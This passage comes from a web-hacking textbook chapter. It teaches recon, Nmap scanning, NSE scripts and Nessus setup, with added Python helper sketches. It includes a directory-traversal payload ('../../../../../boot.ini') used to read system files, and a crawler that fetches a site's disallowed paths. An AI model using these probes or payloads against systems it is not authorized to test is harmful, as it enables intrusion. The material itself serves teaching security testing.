The Basics of Web Hacking: Tools and Techniques to Attack the Web (2013)

Chapter 2. Web Server Hacking

Chapter Rundown:

■ Recon made easy with host and robots.txt

■ Port scanning with Nmap: getting to know the world’s #1 port scanner

■ Vulnerability scanning with Nessus and Nikto: finding missing patches and more

■ Exploitation with Metasploit: a step-by-step guide to poppin’ boxes

Introduction

Web server hacking is a part of the larger universe known casually as “network hacking.” For most people, this is the first area of hacking that they dig into as it includes the most well-known tools and has been widely publicized in the media. Just check out the movies that make use of some of the tools in this chapter!

Obviously, network hacking isn’t the emphasis of this book, but there are certain tools and techniques that every security person should know about. These are introduced in this chapter as we target the web server that is hosting the web application. Network hacking makes use of some of the most popular hacking tools in the world today: beauties such as Nmap, Nessus, and Metasploit are tools in virtually every security toolbox. In order to position yourself to take on more advanced hacking techniques, you must first master the usage of these seminal tools. This is the classic “walk before you run” scenario!

There are several tremendous books and resources dedicated to these tools, but things take on a slightly different format when we are specifically targeting the web server. Traditional network hacking follows a very systematic methodology that this book is based on. We will perform reconnaissance, port scanning, vulnerability scanning, and exploitation while targeting the web server as the network service under attack.

We will perform some manual inspection of the robots.txt file on the web server to better understand what directories the owner does not want to be included in search engine results. This is a potential roadmap to follow to sensitive information within the web server—and we can do so from the comfort of our own web browser! We will also use some specific tools dedicated to web server hacking such as Nikto for web server vulnerability scanning. Couple all of this with the mature tools and techniques of traditional network hacking, and we have a great approach for hacking the web server. Let’s dig in!

Reconnaissance

During the Reconnaissance stage (also known as recon or information gathering), you gather as much information about the target as possible such as its IP address; the network topology; devices on the network; technologies in use; package versions; and more. While many tools may be involved in recon, we’ll focus first on using host and Netcraft to retrieve the server’s IP address (unique numeric address) and to inspect its robots.txt file for additional information about the target environment.

Recon is widely considered the most important aspect of a network-based attack. Although recon can be very time-consuming, it forms the basis of almost every successful network attack, so take your time. Be sure to record everything while gathering information. As you run your tools, save the raw output, and you’ll end up with an impressive collection of URLs, IP addresses, email addresses, and other noteworthy tidbits. If you’re conducting a professional penetration test, it’s always a good idea to save this raw output, as you will often need to include it in the final report to your client.

Learning About The Web Server

We are targeting the web server because it is designed to be reachable from outside the network. Its main purpose is to host web applications that can be accessed by users beyond the internal network. As such, it becomes our window into the network. First, we need to find the web server’s external IP address so that we can probe it. We’ll generally start with the URL of the target web application, such as http://syngress.com, and then convert its host name to an IP address. The host name in a URL is text that is easily remembered by a user, while an IP address is the unique numeric address of the web server. Network hacking tools generally use the IP address of the web server, although you can also use the host name and your computer will perform the lookup automatically in the background. To convert a host name to an IP address, use the host command in a BackTrack terminal.

host dsu.edu

This command returns the following results, which include the external IP address of the Dakota State University (dsu.edu) domain as the first entry. The other entry identifies the domain’s mail server (its mail exchanger, or MX, record) and should be archived for potential use later on.

dsu.edu has address 138.247.64.140

dsu.edu mail is handled by 10 dsu-mm01.dsu.edu.
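You may want the same lookup inside your own recon scripts. The following is a minimal Python sketch that uses only the standard library’s socket.getaddrinfo. It returns the IPv4 addresses that host reports on its “has address” lines. The function name resolve_ipv4 is our own. It does not retrieve mail (MX) records; for those you still need host or a dedicated DNS library.

```python
import socket


def resolve_ipv4(hostname: str) -> list[str]:
    """Return the unique IPv4 addresses for a host name.

    This roughly matches the "has address" lines printed by the host command.
    MX (mail) records are not available through the socket module.
    """
    # getaddrinfo returns one tuple per (family, socktype, proto) combination,
    # so the same address can appear several times; a set removes duplicates.
    infos = socket.getaddrinfo(hostname, None, family=socket.AF_INET)
    return sorted({info[4][0] for info in infos})
```

Calling resolve_ipv4("dsu.edu") performs a live DNS query, so the result depends on your resolver and on the domain’s current records.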

You can also retrieve the IP address by searching by URL at http://news.netcraft.com/. A web browser is capable of processing both IP addresses and URLs to retrieve the home page of a web application hosted on a web server. So to make sure that you have found the correct IP address of the web server, enter the IP address directly into a browser to see if you reach the target as shown in Figure 2.1.

Alert

Simply requesting the IP address in the URL address bar doesn’t work in a shared server environment, which is quite widespread today. In such an environment, several web sites are hosted on one IP address in a virtual environment to conserve web server space and resources. As an alternative, you can use an online service such as http://sharingmyip.com/ to find all the domains that share a specified IP address. This lets you make sure that the web server is hosting your intended target before continuing on. Many shared hosting environments require signed agreements before any security testing is allowed to be conducted against the environment.
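Shared hosting works because of name-based virtual hosting. The web server decides which site to return by reading the Host header of each HTTP/1.1 request, not the IP address the request arrived on. The sketch below is a minimal illustration and both function names are hypothetical. It builds a raw request for a chosen host name and reads back the status line, so you can compare how one IP address answers for different host names.

```python
import socket


def build_get_request(host: str, path: str = "/") -> bytes:
    """Build a minimal HTTP/1.1 GET request for the given Host header."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",          # selects the virtual host on a shared server
        "Connection: close",
        "",                       # blank line terminates the header section
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def fetch_status_line(ip: str, host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Send the request to ip while naming host, and return the status line."""
    data = b""
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        sock.sendall(build_get_request(host))
        # recv may return partial data, so read until the first line is complete.
        while b"\r\n" not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.split(b"\r\n", 1)[0].decode("latin-1")
```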

FIGURE 2.1 Using an IP address to reach the target.

The Robots.Txt File

One way to begin understanding what’s running on a web server is to view the server’s robots.txt file. The robots.txt file is a listing of the directories and files on a web server that the owner wants web crawlers to omit from the indexing process. A web crawler is a piece of software that catalogs web content for search engines and archives. Crawlers are most commonly deployed by search engines such as Google and Yahoo. These web crawlers scour the Internet and index (archive) everything they can find to improve the accuracy and speed of their search functionality.

To a hacker, the robots.txt file is a road map to sensitive information, because anyone can retrieve any web server’s robots.txt file in a browser. Here is an example robots.txt file that you can retrieve directly in your browser by requesting /robots.txt after a host URL.

User-agent: *

# Directories

Disallow: /modules/

Disallow: /profiles/

Disallow: /scripts/

Disallow: /themes/

# Files

Disallow: /CHANGELOG.txt

Disallow: /cron.php

Disallow: /INSTALL.mysql.txt

Disallow: /INSTALL.pgsql.txt

Disallow: /install.php

Disallow: /INSTALL.txt

Disallow: /LICENSE.txt

Disallow: /MAINTAINERS.txt

Disallow: /update.php

Disallow: /UPGRADE.txt

Disallow: /xmlrpc.php

# Paths (clean URLs)

Disallow: /admin/

Disallow: /logout/

Disallow: /node/add/

Disallow: /search/

Disallow: /user/register/

Disallow: /user/password/

Disallow: /user/login/

# Paths (no clean URLs)

Disallow: /?q=admin/

Disallow: /?q=logout/

Disallow: /?q=node/add/

Disallow: /?q=search/

Disallow: /?q=user/password/

Disallow: /?q=user/register/

Disallow: /?q=user/login/

This robots.txt file is broken out into four different sections:

1. Directories

2. Files

3. Paths (clean URLs)

4. Paths (no clean URLs)

Clean URLs are human-readable paths, such as /admin/, that you could copy and paste into your browser. Paths without clean URLs use a query-string parameter, q in this example, to drive the functionality of the page. You may have heard this referred to as a builder page, where one page retrieves data based solely on the URL parameter(s) that were passed in. Directories and files are straightforward and self-explanatory.
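The difference between the two path styles is visible once you split a path into its components. The Python sketch below uses the standard library’s urllib.parse; describe_path is a hypothetical helper name. A clean URL carries its meaning in the path, while the non-clean form routes through the root page and passes the real target in the q parameter.

```python
from urllib.parse import parse_qs, urlsplit


def describe_path(path: str) -> tuple[str, dict[str, list[str]]]:
    """Split a robots.txt path into its URL path and its query parameters."""
    parts = urlsplit(path)
    # parse_qs maps each parameter name to a list of values.
    return parts.path, parse_qs(parts.query)
```

For example, describe_path("/admin/") yields ("/admin/", {}), while describe_path("/?q=admin/") yields ("/", {"q": ["admin/"]}).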

Every web server should have a robots.txt file in its root directory; otherwise, web crawlers may index every page and file they can reach on the site. Those are items no web server administrator wants showing up in your next Google search. The root directory of a web server (often called the web root or document root) is the physical directory on the host computer from which the web server serves its content. In Windows, the web root is usually C:\inetpub\wwwroot\, and in Linux it’s usually a close variant of /var/www/.
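Python’s standard library ships a robots.txt parser, urllib.robotparser, which is the kind of check a well-behaved crawler performs before fetching a page. The sketch below feeds it a trimmed copy of the example file above and asks whether a generic crawler may fetch a URL. The host example.com is a placeholder. Note that can_fetch only reports the owner’s wishes; nothing on the server enforces them.

```python
from urllib.robotparser import RobotFileParser

# A trimmed copy of the example robots.txt shown earlier in this section.
ROBOTS_TXT = """\
User-agent: *
Disallow: /modules/
Disallow: /cron.php
Disallow: /admin/
"""


def crawler_may_fetch(robots_txt: str, url: str, user_agent: str = "*") -> bool:
    """Return True if a crawler honoring robots_txt may fetch url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())   # parse text we already have
    return parser.can_fetch(user_agent, url)
```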

There is nothing stopping you from creating a web crawler of your own that provides the complete opposite functionality. Such a tool would, if you so desired, request and retrieve only the items that appear in the robots.txt file. It would save you substantial time if you are performing recon on multiple web servers. Otherwise, you can manually request and review each robots.txt file in the browser. The robots.txt file is a roadblock only for automated web crawlers that choose to honor it. It is not even a speed bump for human hackers who want to review this sensitive information.
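A minimal sketch of such an “opposite” crawler in Python follows. It assumes the robots.txt text has already been downloaded, and both function names are hypothetical. disallowed_urls turns each Disallow entry into an absolute URL. status_codes requests each URL with urllib.request and records the HTTP status. The sketch ignores User-agent grouping and wildcard patterns, so treat it as a starting point rather than a complete parser.

```python
from typing import Optional
from urllib.error import HTTPError
from urllib.parse import urljoin
from urllib.request import urlopen


def disallowed_urls(robots_txt: str, base_url: str) -> list[str]:
    """Turn every non-empty Disallow entry into an absolute URL."""
    urls = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        field, sep, value = line.partition(":")
        # An empty "Disallow:" means "allow everything", so skip it.
        if sep and field.strip().lower() == "disallow" and value.strip():
            urls.append(urljoin(base_url, value.strip()))
    return urls


def status_codes(urls: list[str], timeout: float = 5.0) -> dict[str, Optional[int]]:
    """Request each URL and record its HTTP status (None if unreachable)."""
    results: dict[str, Optional[int]] = {}
    for url in urls:
        try:
            with urlopen(url, timeout=timeout) as response:
                results[url] = response.status
        except HTTPError as err:   # the server answered with 403, 404, ...
            results[url] = err.code
        except OSError:            # URLError (DNS failure, refused connection) or timeout
            results[url] = None
    return results
```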

Port Scanning

Port scanning is simply the process of identifying which ports are open on a target computer. Finding out which services are running on these ports is also a common outcome of this step. Ports on a computer are like any opening that allows entry into a house, whether that’s the front door, side door, or garage door. Continuing the house analogy, services are the traffic that uses an expected entry point into the house. For example, salesmen use the front door, owners use the garage door, and friends use the side door. Just as we expect salesmen to use the front door, we also expect certain services to use certain ports on a computer. It’s pretty standard for HTTP traffic to use port 80 and HTTPS traffic to use port 443. So, if we find ports 80 and 443 open, we can be reasonably sure that HTTP and HTTPS are running and that the machine is probably a web server. Our goal when port scanning is to answer three questions regarding the web server:

1. What ports are open?

2. What services are running on these ports?

3. What versions of those services are running?

If we can get accurate answers to these questions, we will have strengthened our foundation for attack.
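Nmap answers all three questions, but the first one can be sketched in a few lines. The Python function below is our own illustration and performs a TCP connect check: it treats a port as open if a full TCP handshake succeeds. This corresponds to Nmap’s TCP connect scan (-sT), not the SYN scan Nmap uses by default when run with root privileges. The function says nothing about services or versions, which require the kind of probing that Nmap’s -sV switch performs.

```python
import socket
from collections.abc import Iterable


def open_tcp_ports(host: str, ports: Iterable[int], timeout: float = 0.5) -> list[int]:
    """Return the ports on host that accept a full TCP connection."""
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 on success and an error code otherwise,
            # instead of raising for refused or timed-out connections.
            if sock.connect_ex((host, port)) == 0:
                found.append(port)
    return found
```

Against your own machine, open_tcp_ports("127.0.0.1", [80, 3306, 8080]) checks the same web, database, and proxy ports that appear in the Nmap results below.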

Nmap

The most widely used port scanner is Nmap, which is available in BackTrack and has substantial documentation at http://nmap.org. First released by Gordon “Fyodor” Lyon in 1997, Nmap continues to gain momentum as the world’s best port scanner with added functionality in vulnerability scanning and exploitation. The most recent major release of Nmap at the time of this writing is version 6, and it includes a ton of functionality dedicated to scanning web servers.

Updating Nmap

Before you start using Nmap, make sure that you’re running the most recent version by running the nmap -V command in a terminal. If you are not running version 6 or higher, you need to update Nmap. To perform the update, open a terminal in BackTrack and run the apt-get update command followed by apt-get install nmap. The install command upgrades an already installed package to the newest version available in your configured repositories. To confirm that you are running version 6 or higher, use the nmap -V command again after installation is complete.

Running Nmap

There are several scan types in Nmap and switches that add even more functionality. We already know the IP address of our web server, so we can omit many of Nmap’s host discovery scans (finding the IP addresses of servers). We are more interested in harvesting usable information about the ports, services, and versions running on the web server. We can run Nmap against our DVWA web server while it’s running on the localhost (127.0.0.1). From a terminal, run the following Nmap command.

nmap -sV -O -p- 127.0.0.1

Let’s inspect each of the parts of the command you just ran, so we all understand what the scan is trying to accomplish.

■ The -sV designates this scan as a versioning scan that will retrieve specific versions of the discovered running services.

■ The -O means information regarding the operating system will be retrieved, such as the type and version.

■ The -p- means we will scan all ports.

■ The 127.0.0.1 is the IP address of our target.

One of Nmap’s most useful features is remote operating system fingerprinting (the -O switch), which complements the service and version detection performed by -sV. Nmap sends a series of packets to the remote host and compares the responses to its nmap-os-db database of more than 2,600 known operating system fingerprints. The results of our first scan are shown below.

Nmap scan report for localhost (127.0.0.1)

Host is up (0.000096s latency).

Not shown: 65532 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.14 ((Ubuntu))

3306/tcp open mysql MySQL 5.1.41-3ubuntu12.10

7337/tcp open postgresql PostgreSQL DB 8.4.0

8080/tcp open http-proxy Burp Suite Pro http proxy

Device type: general purpose

Running: Linux 2.6.X|3.X

OS CPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3

OS details: Linux 2.6.32 - 3.2

Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/.

Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds

You can see four columns of results: PORT, STATE, SERVICE, and VERSION. In this instance, we have four rows of results meaning we have four services running on this web server. It is pretty self-explanatory what is running on this machine (your results may vary slightly depending on what you have running in your VM), but let’s discuss each, so we are all on the same page with these Nmap results.

■ There is an Apache 2.2.14 web server running on port 80.

■ There is a MySQL 5.1.41 database running on port 3306.

■ There is a PostgreSQL 8.4 database running on port 7337.

■ There is a web proxy (Burp Suite) running on port 8080.
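If you save Nmap’s output as recommended in the recon section, you can pull these four columns into your notes with a short script. The Python sketch below parses the PORT/STATE/SERVICE/VERSION rows of Nmap’s normal (human-readable) output as shown above. PortRow and parse_port_rows are hypothetical names. For anything beyond a quick look, Nmap’s XML output (-oX) is the more robust format to parse.

```python
import re
from typing import NamedTuple


class PortRow(NamedTuple):
    port: int
    protocol: str
    state: str
    service: str
    version: str


# e.g. "80/tcp open http Apache httpd 2.2.14 ((Ubuntu))"
ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_port_rows(text: str) -> list[PortRow]:
    """Extract port rows from Nmap normal output, ignoring all other lines."""
    rows = []
    for line in text.splitlines():
        match = ROW.match(line.strip())
        if match:
            port, proto, state, service, version = match.groups()
            rows.append(PortRow(int(port), proto, state, service, version.strip()))
    return rows
```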

Knowing the exact services and versions will be a great piece of information in the upcoming vulnerability scanning and exploitation phases. There are also additional notes about the kernel version, the operating system build details, and the number of network hops (0 because we scanned our localhost).

Alert

Running Nmap against localhost can be deceiving, because ports that are listening on the machine may not be reachable from other machines, whether those machines sit on the same local area network (LAN) or completely outside it. 127.0.0.1 is the loopback address that every machine uses to communicate with itself, so it pertains only to the local machine. To get a clear understanding of what is accessible to outsiders, you would need to run this same Nmap scan from two other machines. You could run one scan from a machine inside the network (your coworker’s machine) and one from a machine outside the network (your home machine). You would then have three sets of results to compare. It’s not critical that you do this for our work, but it’s important to realize that you may get different results depending on which network you scan from.

Nmap Scripting Engine (NSE)

One of the ways Nmap has expanded its functionality is the inclusion of scripts that conduct specialized scans. To make use of a script, you simply invoke it and provide any necessary arguments. The Nmap Scripting Engine (NSE) handles this functionality and, fortunately for us, has tons of web-specific scripts ready to use. Our DVWA web server is pretty boring, but it’s important to realize what is possible with NSE. There are nearly 400 Nmap scripts (396 to be exact at last count), so you’re sure to find a couple that are useful! You can see all current NSE scripts and the accompanying documentation at http://nmap.org/nsedoc/. Here are a couple of applicable Nmap scripts that you can use on web servers.

You invoke all NSE scripts with --script=<script name> as part of the Nmap scan syntax. This example uses the http-enum script to enumerate directories used by popular web applications and servers as part of a version scan.

nmap -sV --script=http-enum 127.0.0.1

A sample output of this script run against a Windows machine is shown below, where several common directories and files have been found. These directories can be used in later steps of our approach related to path traversal attacks. If you run this same NSE script against DVWA, you will see several directories listed and an instance of MySQL running.

Interesting ports on 127.0.0.1:

PORT STATE SERVICE REASON

80/tcp open http syn-ack

| http-enum:

| | /icons/: Icons and images

| | /images/: Icons and images

| | /robots.txt: Robots file

| | /sw/auth/login.aspx: Citrix WebTop

| | /images/outlook.jpg: Outlook Web Access

| | /nfservlets/servlet/SPSRouterServlet/: netForensics

|_ |_ /nfservlets/servlet/SPSRouterServlet/: netForensics

Another very helpful web server scan uses the http-frontpage-login script to check whether the target machine is vulnerable to anonymous Microsoft FrontPage logins on port 80. You may be thinking, “I thought FrontPage was only a Windows environment functionality.” Obviously, this is most applicable to Windows environments that are running FrontPage, but when FrontPage extensions were still widely used, they were supported on Linux systems as well. FrontPage extensions are no longer supported by Microsoft, but they can still be found on older web servers.

nmap 127.0.0.1 -p 80 --script=http-frontpage-login

The sample output of the http-frontpage-login script is shown below. Older default configurations of FrontPage extensions allow remote users to log in anonymously, which may lead to complete server compromise.

PORT STATE SERVICE REASON

80/tcp open http syn-ack

| http-frontpage-login:

| VULNERABLE:

| Frontpage extension anonymous login

| State: VULNERABLE

| Description:

| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.

|

| References:

|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
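Every NSE invocation in this chapter follows the same pattern, and a small helper that builds the argument list makes the syntax explicit. In the Python sketch below, nse_command and run_nse are hypothetical helper names. Each option and its value stay joined by “=” with no surrounding spaces. If you type spaces around “=”, the shell splits the option into separate words, and Nmap no longer receives the script name or script arguments as intended. Passing the list to subprocess.run avoids the shell entirely.

```python
import shutil
import subprocess
from typing import Optional


def nse_command(target: str, scripts: list[str],
                script_args: Optional[dict[str, str]] = None,
                ports: Optional[str] = None,
                version_scan: bool = False) -> list[str]:
    """Build an nmap argument list that runs one or more NSE scripts."""
    cmd = ["nmap"]
    if version_scan:
        cmd.append("-sV")
    if ports:
        cmd += ["-p", ports]
    # Option and value form one argument: "--script=name", never "--script = name".
    cmd.append("--script=" + ",".join(scripts))
    if script_args:
        pairs = ",".join(f"{key}={value}" for key, value in script_args.items())
        cmd.append("--script-args=" + pairs)
    cmd.append(target)
    return cmd


def run_nse(cmd: list[str]) -> str:
    """Run the command without a shell and return Nmap's normal output."""
    if shutil.which(cmd[0]) is None:
        raise FileNotFoundError(f"{cmd[0]} is not installed or not on PATH")
    result = subprocess.run(cmd, capture_output=True, text=True, check=True)
    return result.stdout
```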

The last NSE example included here checks whether a web server is vulnerable to directory traversal by attempting to retrieve the /etc/passwd file on a Linux web server or the boot.ini file on a Windows web server. Directory traversal is a vulnerability that allows an attacker to access resources in the web server’s file system that should not be accessible. This type of attack is covered in much more detail in a later chapter, but it’s tremendously useful to have Nmap check for this vulnerability during the web server hacking portion of our approach. This is another great example of a discovery made in one step that can be used later when attacking different targets.

nmap --script http-passwd --script-args http-passwd.root=/ 127.0.0.1

This is a great NSE script because it is difficult for automated web application scanners to check for directory traversal on the web server. Sample output illustrating this vulnerability is shown below.

80/tcp open http

| http-passwd: Directory traversal found.

| Payload: "index.html?../../../../../boot.ini"

| Printing first 250 bytes:

| [boot loader]

| timeout=30

| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

| [operating systems]

|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
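The payload in this output works because each ../ climbs one directory, and enough of them walk out of the web root entirely. The Python sketch below illustrates the idea on POSIX-style paths only; the Windows boot.ini case uses backslashes and drive letters, which it does not model. resolve_request mimics a hypothetical handler that naively joins the requested name onto an assumed web root of /var/www. stays_in_root shows the containment check that a safe handler performs after normalizing the path.

```python
import posixpath

WEB_ROOT = "/var/www"  # assumed document root for this illustration


def resolve_request(requested: str, web_root: str = WEB_ROOT) -> str:
    """Naively join the requested name onto the web root and normalize it,
    returning the path a vulnerable handler would end up opening."""
    return posixpath.normpath(posixpath.join(web_root, requested))


def stays_in_root(requested: str, web_root: str = WEB_ROOT) -> bool:
    """Return True only if the normalized path is still inside web_root."""
    resolved = resolve_request(requested, web_root)
    # commonpath compares whole path components, so "/var/wwwx" does not
    # count as being inside "/var/www".
    return posixpath.commonpath([resolved, web_root]) == web_root
```

Here resolve_request("../../../../../etc/passwd") normalizes to /etc/passwd, which is exactly the file http-passwd tries to retrieve on Linux.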

The Nmap findings from port scanning tie directly into the following sections when Nessus and Nikto are used to scan for vulnerabilities in the web server.

Vulnerability Scanning

Vulnerability scanning is the process of detecting weaknesses in running services. Once you know the details of the target web server, such as the IP address, open ports, running services, and versions of these services, you can then check these services for vulnerabilities. This is the last step to be performed before exploiting the web server.

Vulnerability scanning is most commonly completed using automated tools loaded with a collection of exploit and fuzzing signatures, or plug-ins. These plug-ins probe the target computer’s services to see how they react to possible attacks. If a service reacts in a certain way, the vulnerability scanner is triggered and knows not only that the service is vulnerable but also which specific vulnerability is present.

This is very similar to how antivirus works on your home computer. When a program tries to execute on your computer, the antivirus product checks its collection of known-malicious signatures and determines whether the program is a virus. Vulnerability scanners and antivirus products are only as good as the signatures they check against. If the plug-ins of your vulnerability scanner are out-of-date, the results will not be 100% accurate. If the plug-ins flag something that isn’t actually vulnerable (a false positive), the results will not be 100% legitimate. If the plug-ins miss an actual vulnerability (a false negative), the results will not be 100% complete. I’m sure you get the drift by now!
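At its simplest, a version-based plug-in compares the version a service reports against a known threshold. The Python sketch below uses the Apache banner and the 2.2.19 threshold that Nikto reports later in this chapter. The function names are hypothetical, and real scanners use far richer signatures. Versions are compared as integer tuples because plain string comparison gets them wrong: "2.2.9" sorts after "2.2.14" as text.

```python
import re
from typing import Optional


def parse_version(text: str) -> tuple[int, ...]:
    """Turn "2.2.14" into (2, 2, 14) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def is_outdated(banner: str, product: str, minimum: str) -> Optional[bool]:
    """Check a server banner against a minimum version.

    Returns True if the banner reports `product` older than `minimum`,
    False if it is at least `minimum`, and None if `product` is absent.
    """
    match = re.search(re.escape(product) + r"/(\d+(?:\.\d+)*)", banner)
    if match is None:
        return None
    return parse_version(match.group(1)) < parse_version(minimum)
```

This is also where false positives creep in. Distributions such as Ubuntu backport security fixes without changing the upstream version string, so a banner-only check can flag a server that is in fact patched.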

It’s critical that you understand vulnerability scanning’s place in the total landscape of hacking. Very advanced hackers don’t rely on a vulnerability scanner to find exploitable vulnerabilities. Instead, they perform manual analysis to find vulnerabilities in software packages and then write their own exploit code. This is outside the scope of this book, but in order to climb the mountain of elite hacking, you will need to become comfortable with fuzzing, debugging, reverse engineering, custom shellcode, and manual exploitation. These topics will be discussed in more detail in the final chapter of this book to give you guidance moving forward.

Nessus

We will be using Nessus, one of the most popular vulnerability scanners available, to complete the vulnerability scanning step. However, hackers who rely on vulnerability scanners will always be a step behind the cutting edge of security, because they have to wait for the scanner vendor to write a plug-in that detects each new vulnerability. That said, vendors often move quickly. It is very common to read about a new exploit and, mere hours later, have a Nessus plug-in deployed to check for it. Better yet, you will often read about the new vulnerability and the corresponding Nessus plug-in in the same story! When you use the free HomeFeed edition of Nessus, your plug-ins will be delayed 7 days. Your results for the most recent vulnerabilities may therefore differ from those of the paid ProfessionalFeed edition.

Installing Nessus

The process to install Nessus is very straightforward, and once it’s configured it will run as a persistent service in BackTrack. You can download the installer for the free home version of Nessus at http://www.nessus.org. The ProfessionalFeed version of Nessus is approximately $1,500 per year, but you can use the HomeFeed version to assess your own personal servers. If you are going to perform vulnerability scanning as part of your job or anywhere outside your personal network, you need to purchase the ProfessionalFeed activation code.

You must pick the Nessus installer that matches the operating system the Nessus service will run on. For this book, you are using a 32-bit virtual machine of BackTrack 5, which is based on Ubuntu (version 10.04 at the time of this writing). When you register for the HomeFeed, your activation code will be emailed to you. Keep this email in a safe place, as you will need the activation code in the upcoming Nessus configuration steps. A quick rundown of the installation process for Nessus is described in the following steps.

1. Save the Nessus installer (.deb file for BackTrack) in the root user’s home directory (/root).

2. Open a terminal, run the ls command, and confirm that the .deb file is in that directory.

3. Run the dpkg -i Nessus-5.0.3-ubuntu910_i386.deb command to install Nessus.

Alert

dpkg is the package manager that Debian-based Linux distributions use to install and manage individual packages. You may have downloaded a different version of the Nessus installer, so please take note of the exact name of the file you downloaded. If you’re unsure which version of Nessus you need, you can run the lsb_release -a command in a BackTrack terminal to retrieve the operating system version details. You can then pick the matching Nessus installer and use that .deb file in the dpkg command to install Nessus.

Configuring Nessus

Once you have installed Nessus, you must start the service before using the tool. You will only have to issue the /etc/init.d/nessusd start command in a terminal once and then Nessus will run as a persistent service on your system. Once the service is running, the following steps introduce how to configure Nessus.

1. In a browser, go to https://127.0.0.1:8834/ to start the Nessus configuration procedure.

2. When prompted, create a Nessus administrator user. For this book, we will create the root user with a password of toor.

3. Enter the activation code for the HomeFeed from your email.

4. Log in as the root user after the configuration completes.

Alert

■ You must use https in the URL to access the Nessus server as it mandates a secure connection.

■ The Nessus server is running on the localhost (127.0.0.1) and port 8834; therefore, you must include :8834 as part of the URL.

■ The downloading of Nessus plug-ins and initial configuration will take 5-6 min depending on your hardware configuration. Have no fear; Nessus will load much quicker during future uses!

Running Nessus

Once you’ve logged into Nessus, the first task is to specify which plug-ins will be used in the scan. We will be performing a safe scan on our localhost, which runs all selected plug-ins but does not attempt actual exploitation. This is a great approach for a proof-of-concept scan and reduces the risk of network outages caused by active exploitation. Follow these steps to set up the scan policy and the actual scan in Nessus.

1. Click the Scans menu item to open the scans menu.



2. Click New Scan to define a new scan, enter localhost check for the name of the scan, select Internal Network Scan for the Scan Policy, and enter 127.0.0.1 as the scan target as shown in Figure 2.2.

FIGURE 2.2 Setting up “localhost check” scan in Nessus.

3. Click the Create Scan button in the lower left of the screen to fire the scan at the target!



Once the scan is kicked off, the Scans window will report the ongoing status as shown in Figure 2.3.

FIGURE 2.3 Scan confirmation in Nessus.

The scan of 127.0.0.1 will be chock-full of serious vulnerabilities because BackTrack is our operating system.

Alert

This is a good time to remind you not to use BackTrack as your everyday operating system. It’s great at what it does (hacking!), but it’s not a good choice for online banking, checking your email, or connecting to unsecured networks. I would advise you to always have BackTrack available as a virtual machine, but never rely on it as your base operating system.

Reviewing Nessus Results



Once the scan status is completed, you can view the report by clicking on the Results menu item, clicking the localhost check report to open it, and clicking on the purple critical items as shown in Figure 2.4.

FIGURE 2.4 Report summary in Nessus.



The summary view of the report is sorted by the severity of each vulnerability, with Critical being the most severe. The other severity values are High, Medium, Low, and Informational. You can drill down into greater detail on any vulnerability by double-clicking its report entry as shown in Figure 2.5.

FIGURE 2.5 Report details showing CVE in Nessus.
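If you collect findings for your own report-building, the same severity ordering is easy to reproduce. The Python sketch below uses the five severity levels listed above and hypothetical finding names; it does not model any Nessus export format. Because Python’s sorted() is stable, findings of equal severity keep their original relative order.

```python
from typing import NamedTuple

# Most severe first, the same order the Nessus summary view uses.
SEVERITIES = ["Critical", "High", "Medium", "Low", "Informational"]
SEVERITY_RANK = {name: rank for rank, name in enumerate(SEVERITIES)}


class Finding(NamedTuple):
    name: str
    severity: str


def sort_by_severity(findings: list[Finding]) -> list[Finding]:
    """Order findings most severe first; ties keep their original order."""
    return sorted(findings, key=lambda finding: SEVERITY_RANK[finding.severity])


def count_by_severity(findings: list[Finding]) -> dict[str, int]:
    """Tally findings per severity level, including levels with zero hits."""
    counts = {name: 0 for name in SEVERITIES}
    for finding in findings:
        counts[finding.severity] += 1
    return counts
```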

The Common Vulnerabilities and Exposures (CVE) identifier is especially valuable because these IDs are used to transition from Nessus’ vulnerability scanning to Metasploit’s exploitation. CVE identifiers are made up of a year and a unique sequence number. The year reflects when the ID was assigned or the vulnerability was made public, not necessarily when it was discovered. There are several other sources of information about the CVEs found during Nessus scanning that you can review. The official CVE site is at https://cve.mitre.org/, and additional details are available at http://www.cvedetails.com/, where you can subscribe to RSS feeds customized to your liking. Another great resource is http://packetstormsecurity.com/, where full disclosures of vulnerabilities are cataloged. I encourage you to use all these resources as you work on web server hacking!
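Because CVE identifiers follow a fixed pattern (CVE, a four-digit year, then a sequence number of at least four digits), you can pull them out of saved scanner output to look up on the sites above. The Python sketch below is a minimal illustration; CveId and find_cves are hypothetical names. It accepts sequence numbers longer than four digits, which MITRE’s identifier syntax has allowed since 2014.

```python
import re
from typing import NamedTuple

# "CVE-", a four-digit year, "-", then a sequence number of four or more digits.
CVE_PATTERN = re.compile(r"\bCVE-(\d{4})-(\d{4,})\b")


class CveId(NamedTuple):
    year: int
    sequence: int

    def __str__(self) -> str:
        # Re-pad short sequence numbers, e.g. 160 -> "0160".
        return f"CVE-{self.year}-{self.sequence:04d}"


def find_cves(text: str) -> list[CveId]:
    """Return the unique CVE identifiers in text, sorted by year then number."""
    found = {CveId(int(year), int(seq)) for year, seq in CVE_PATTERN.findall(text)}
    return sorted(found)
```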

Nikto

Nikto is an open-source vulnerability scanner, written in Perl and originally released in late 2001, that provides additional vulnerability scanning specific to web servers. It performs checks for 6400 potentially dangerous files and scripts, 1200 outdated server versions, and nearly 300 version-specific problems on web servers.

